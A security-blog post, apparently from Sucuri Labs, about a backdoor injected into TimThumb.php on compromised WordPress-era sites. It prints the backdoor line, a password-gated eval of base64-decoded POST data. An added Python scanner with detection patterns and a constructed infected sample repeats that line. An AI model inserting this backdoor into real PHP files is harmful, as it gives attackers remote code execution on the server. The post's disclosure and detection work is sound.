TimThumb.php backdoor

If your site was recently compromised through the TimThumb.php vulnerability, check that script to make sure it was not also modified to act as a backdoor.

On many sites, we are seeing timthumb.php with the following code added to it:

if (md5 (md5($_POST['p']))==='xxx8ab2ab.. a4ec61072xxx')
die (eval ( base64_decode ($_POST['c'])));

If you are not sure what this code does: it takes a password from the "p" POST variable, and if the double MD5 hash of that password matches the hard-coded value, it base64-decodes and executes any PHP code the attackers send in the "c" POST variable.
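One way to check a web root for this injected line, as an added example that is not part of the original post. The rule names and sample strings are constructed, the hash is a placeholder, and the patterns go slightly beyond the page's sample by also matching $_GET, $_REQUEST and $_COOKIE.

```python
import re
import sys
from pathlib import Path

# Request superglobals an injected line could read from (the page's sample uses $_POST).
_SRC = r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\["
RULES = [
    # md5(md5($_POST['p'])) compared against a hard-coded hash
    ("md5-password-gate", re.compile(r"md5\s*\(\s*md5\s*\(\s*" + _SRC, re.I)),
    # eval(base64_decode($_POST['c']))
    ("eval-base64-request", re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*" + _SRC, re.I)),
]

def scan_source(src):
    """Return sorted (line_number, rule_name) pairs for every rule hit in src."""
    hits = []
    for name, rx in RULES:
        for m in rx.finditer(src):
            # Line number of the match start; patterns may span line breaks.
            hits.append((src.count("\n", 0, m.start()) + 1, name))
    return sorted(hits)

def scan_tree(root):
    """Scan every .php file under root; return {path: hits} for files with hits."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        if not path.is_file():
            continue
        hits = scan_source(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

# Constructed samples (not taken from a real site); the hash is a placeholder.
INFECTED_SAMPLE = """<?php
// thumbnail script header
if (md5 (md5($_POST['p']))==='PLACEHOLDER_HASH')
die (eval ( base64_decode ($_POST['c'])));
define('VERSION', '1.0');
"""
CLEAN_SAMPLE = """<?php
$src = isset($_GET['src']) ? $_GET['src'] : '';
echo md5($src);
"""

if __name__ == "__main__":
    # With a path argument, scan that tree; otherwise show the constructed samples.
    for path, hits in (scan_tree(sys.argv[1]) if len(sys.argv) > 1 else
                       {"infected sample": scan_source(INFECTED_SAMPLE)}).items():
        for line, rule in hits:
            print(f"{path}:{line}: {rule}")
```

A hit is a reason to inspect the file by hand and compare it with a known-good copy; a file with no hits is not proven clean, since a differently written or obfuscated backdoor will not match these two patterns.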

For more details on the timthumb.php vulnerability, see our earlier posts about it. For more information about backdoors, see our post on the subject: ASK Sucuri: What about the backdoors?

About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.